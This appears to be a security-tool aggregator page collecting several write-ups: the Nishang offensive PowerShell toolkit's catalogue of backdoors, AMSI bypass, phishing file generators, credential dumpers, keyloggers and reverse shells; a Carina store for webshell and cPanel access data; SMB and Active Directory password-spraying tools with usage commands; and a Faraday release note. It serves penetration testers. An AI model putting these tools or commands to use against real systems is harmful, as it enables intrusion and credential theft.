A backdoor which can use alternate data streams and Windows Registry to achieve persistence.
Add-RegBackdoor
A backdoor which uses well known Debugger trick to execute payload with Sticky keys and Utilman (Windows key + U).
Set-RemoteWMI
Modify permissions of DCOM and WMI namespaces to allow access to a non-admin user.
Set-RemotePSRemoting
Modify permissions of PowerShell remoting to allow access to a non-admin user.

Bypass
Invoke-AmsiBypass
Implementation of publicly known methods to bypass/avoid AMSI.

Client
Out-CHM
Create infected CHM files which can execute PowerShell commands and scripts.
Out-Word
Create Word files and infect existing ones to run PowerShell commands and scripts.
Out-Excel
Create Excel files and infect existing ones to run PowerShell commands and scripts.
Out-HTA
Create a HTA file which can be deployed on a web server and used in phishing campaigns.
Out-Java
Create signed JAR files which can be used with applets for script and command execution.
Out-Shortcut
Create shortcut files capable of executing PowerShell commands and scripts.
Out-WebQuery
Create IQY files for phishing credentials and SMB hashes.
Out-JS
Create JS files capable of executing PowerShell commands and scripts.
Out-SCT
Create SCT files capable of executing PowerShell commands and scripts.
Out-SCF
Create a SCF file which can be used for capturing NTLM hash challenges.

Escalation
Enable-DuplicateToken
When SYSTEM privileges are required.
Remove-Update
Introduce vulnerabilities by removing patches.
Invoke-PsUACme
Bypass UAC.

Execution
Download-Execute-PS
Download and execute a PowerShell script in memory.
Download_Execute
Download an executable in text format, convert it to an executable, and execute.
Execute-Command-MSSQL
Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.
Execute-DNSTXT-Code
Execute shellcode in memory using DNS TXT queries.
Out-RundllCommand
Execute PowerShell commands and scripts or a reverse PowerShell session using rundll32.exe.

Gather
Check-VM
Check for a virtual machine.
Copy-VSS
Copy the SAM file using Volume Shadow Copy Service.
Invoke-CredentialsPhish
Trick a user into giving credentials in plain text.
FireBusterFireListener
A pair of scripts for egress testing
Get-Information
Get juicy information from a target.
Get-LSASecret
Get LSA Secret from a target.
Get-PassHashes
Get password hashes from a target.
Get-WLAN-Keys
Get WLAN keys in plain text from a target.
Keylogger
Log keystrokes from a target.
Invoke-MimikatzWdigestDowngrade
Dump user passwords in plain on Windows 8.1 and Server 2012
Get-PassHints
Get password hints of Windows users from a target.
Show-TargetScreen
Connect back and Stream target screen using MJPEG.
Invoke-Mimikatz
Load mimikatz in memory. Updated and with some customisation.
Invoke-Mimikittenz
Extract juicy information from target process (like browsers) memory using regex.
Invoke-SSIDExfil
Exfiltrate information like user credentials, using WLAN SSID.
Invoke-SessionGopher
Identify admin jump-boxes and/or computers used to access Unix machines.

MITM
Invoke-Interceptor
A local HTTPS proxy for MITM attacks.

Pivot
Create-MultipleSessions
Check credentials on multiple computers and create PSSessions.
Run-EXEonRemote Copy and execute an executable on multiple machines.
Invoke-NetworkRelay Create network relays between computers.

Prasadhak
Prasadhak
Check running hashes of running process against the VirusTotal database.

Scan
Brute-Force
Brute force FTP, Active Directory, MSSQL, and Sharepoint.
Port-Scan
A handy port scanner.

Powerpreter
Powerpreter
All the functionality of nishang in a single script module.

Shells
Invoke-PsGcat
Send commands and scripts to specifed Gmail account to be executed by Invoke-PsGcatAgent
Invoke-PsGcatAgent
Execute commands and scripts sent by Invoke-PsGcat.
Invoke-PowerShellTcp
An interactive PowerShell reverse connect or bind shell
Invoke-PowerShellTcpOneLine
Stripped down version of Invoke-PowerShellTcp. Also contains, a skeleton version which could fit in two tweets.
Invoke-PowerShellTcpOneLineBind
Bind version of Invoke-PowerShellTcpOneLine.
Invoke-PowerShellUdp
An interactive PowerShell reverse connect or bind shell over UDP
Invoke-PowerShellUdpOneLine
Stripped down version of Invoke-PowerShellUdp.
Invoke-PoshRatHttps
Reverse interactive PowerShell over HTTPS.
Invoke-PoshRatHttp
Reverse interactive PowerShell over HTTP.
Remove-PoshRat
Clean the system after using Invoke-PoshRatHttps
Invoke-PowerShellWmi
Interactive PowerShell using WMI.
Invoke-PowerShellIcmp
An interactive PowerShell reverse shell over ICMP.
Invoke-JSRatRundll
An interactive PowerShell reverse shell over HTTP using rundll32.exe.
Invoke-JSRatRegsvr
An interactive PowerShell reverse shell over HTTP using regsvr32.exe.

Utility
Add-Exfiltration
Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.
Add-Persistence
Add reboot persistence capability to a script.
Remove-Persistence
Remote persistence added by the Add-Persistence script.
Do-Exfiltration
Pipe (|) this to any script to exfiltrate the output.
Download
Transfer a file to the target.
Parse_Keys
Parse keys logged by the keylogger.
Invoke-Encode
Encode and compress a script or string.
Invoke-Decode
Decode and decompress a script or string from Invoke-Encode.
Start-CaptureServer
Run a web server which logs Basic authentication and SMB hashes.
ConvertTo-ROT13
Encode a string to ROT13 or decode a ROT13 string.
Out-DnsTxt
Generate DNS TXT records which could be used with other scripts.
[Base64ToString]
[StringToBase64]
[ExetoText]
[TexttoExe]

Updates
Updates about Nishang can be found at my blog http://labofapenetrationtester.com and my Twitter feed @nikhil_mitt.

Bugs, Feedback and Feature Requests
Please raise an issue if you encounter a bug or have a feature request. You can email me at nikhil [dot] uitrgpv at gmail.com

Blog Posts
Some helpful blog posts to check out for beginners:
http://www.labofapenetrationtester.com/2014/06/nishang-0-3-4.html
http://labofapenetrationtester.com/2012/08/introducing-nishang-powereshell-for.html
http://labofapenetrationtester.com/2013/08/powerpreter-and-nishang-Part-1.html
http://www.labofapenetrationtester.com/2013/09/powerpreter-and-nishang-Part-2.html
All posts about Nishang:
http://www.labofapenetrationtester.com/search/label/Nishang


Carina - Webshell, Virtual Private Server (VPS) And cPanel Database

$
0
0

Carina is a web application used to store webshell, Virtual Private Server (VPS) and cPanel data. Carina is made so that we don't need to store webshell, VPS or cPanel data in "strange places".

Screenshots





Install Carina
  1. $ git clone https://github.com/c0delatte/carina && cd carina
  2. Run composer update.
  3. Edit .env.example with your database configuration.
  4. Run php artisan migrate for generate required tables.
  5. Run php artisan serve.

Contact
If you discover something stupid within Carina, please send an e-mail to us via abay@codelatte.org.


Minimalistic-offensive-security-tools - A Repository Of Tools For Pentesting Of Restricted And Isolated Environments

$
0
0

Minimalistic SMB login bruteforcer (smblogin.ps1)
A simple SMB login attack and password spraying tool.
It takes a list of targets and credentials (username and password) as parameters and it tries to authenticate against each target using the provided credentials.
Despite its minimalistic design, the tool keeps track of everything by writing every result into a text file. This allows the tool to be easily resumed if it was interrupted or skip already compromised targets.

Usage and examples
Import-Module .\smblogin.ps1

# Usage:
smblogin <hosts.txt> <username> <password>

# Examples:
smblogin hosts.txt .\Administrator P@ssw0rd
smblogin hosts.txt CORP\bkpadmin P@ssw0rd
Note: The extra mini version lacks check for port tcp/445, otherwise the functionality is the same.

Screenshot
SMB password spraying over the network:


For more information, visit https://www.infosecmatter.com/minimalistic-smb-login-bruteforcer/

Minimalistic AD login bruteforcer (adlogin.ps1)

A simple Active Directory login attack tool.
It takes list of usernames and a password and tries to login with it against specified AD domain using LDAP (directoryservices).
It also retains results in a file in the current working directory, so it can be interrupted and resumed (it will not try to login again if the given user has already been compromised or tried with the given password).

Usage and examples
Import-Module .\adlogin.ps1

# Usage:
adlogin <userlist.txt> <domain> <password>

# Example:
adlogin users.txt domain.com P@ssw0rd

# Check results (find valid credentials):
gc adlogin.*.txt | sls True

Screenshot
Password login attack against domain users:


For more information, visit https://www.infosecmatter.com/minimalistic-ad-login-bruteforcer/


Faraday v3.11 - Collaborative Penetration Test and Vulnerability Management Platform

$
0
0

This new release brings strong improvements to your security team’s daily performance, allowing them to operate quicker and smarter by increasing accessibility and stabilizing usual functionality.

Major enhancements are focused on providing global visualization of findings, improvements on our API allowing better 3rd party integrations, and outstanding tailoring of the results with our new methods for customizing executive reports, among others, but let’s go more in-depth!



Start integrating everything

As you may know Faraday allows you to unify all your vulnerability ecosystem, integrating results from tools. We’ve added new plugins to get more information into your instance: Qualys Web App, WPScan (in JSON format), Checkmarx, and WhiteSource.

We’ve also enhanced and updated some of our existing plugins: Netsparker, w3af, and Nessus (which now adds scan date from your report to Faraday instead of the upload date, and now has support for CISBenchmark).

Make more out of our API

We now support openAPI documentation for our API, which will allow for an automated and much more detailed knowledge base on how to use it.

We’ve also added the possibility of bulk deleting Hosts from the API, and the issuetracker_json field which, if you’re using our JIRA or Servicenow integration available for Corporate users, will give you details about the issue you created from Faraday to your ticketing instance. You can also use this field on your Executive Reports, and can render either the URL of your issue or just the ID for it.

{“jira”: 
{“key”: “YCN-51630”,
“self”: “https://jira.yourcompany.com/browse/YCN-51630",
“url”: “https://jira.yourcompany.com"}
}

Executive Reports

Showing the results correctly is an important step in the vuln management and there’s also a much asked for enhancement for Executive Reports: Markdown custom field, so you can format information directly on your Faraday instance and it will be rendered as such on your report.


Export/Import information seamlessly

Sharing information between Workspaces is now extremely easy. Simply download a CSV file with all your Vulns and directly upload it to a different space.

This will allow you to easily backup or import/export your Vuln information between Workspaces, or even unify WS into one, and create a general Dashboard, data analysis, and report that will show unified information between different projects!

For example, you have three WS with findings/mitigations from different countries and you want to get a regional visualization or global data analysis of them.


Enhancements to agent scheduling, encryption, workflows, dashboard, command-history, faraday-client were also done to increase reliability.

This is Faraday’s latest version and it is ready for you to update, but stay tuned, because our team is working to make a big leap in the coming months:


Faraday Cloud customers are already experiencing the mentioned improvements and also several upgrades within the backend to obtain the highest possible performance. Haven’t you tried our Cloud version yet? Tell us!

For any requests/questions, please contact us at sales@faradaysec.com and we’ll be happy to assist you with what you need.


Faraday Crew
https://www.faradaysec.com
https://github.com/infobyte/faraday
https://twitter.com/faradaysec
https://www.instagram.com/faradaysec/
https://www.linkedin.com/company/faradaysec
Viewing all 5816 articles
Browse latest View live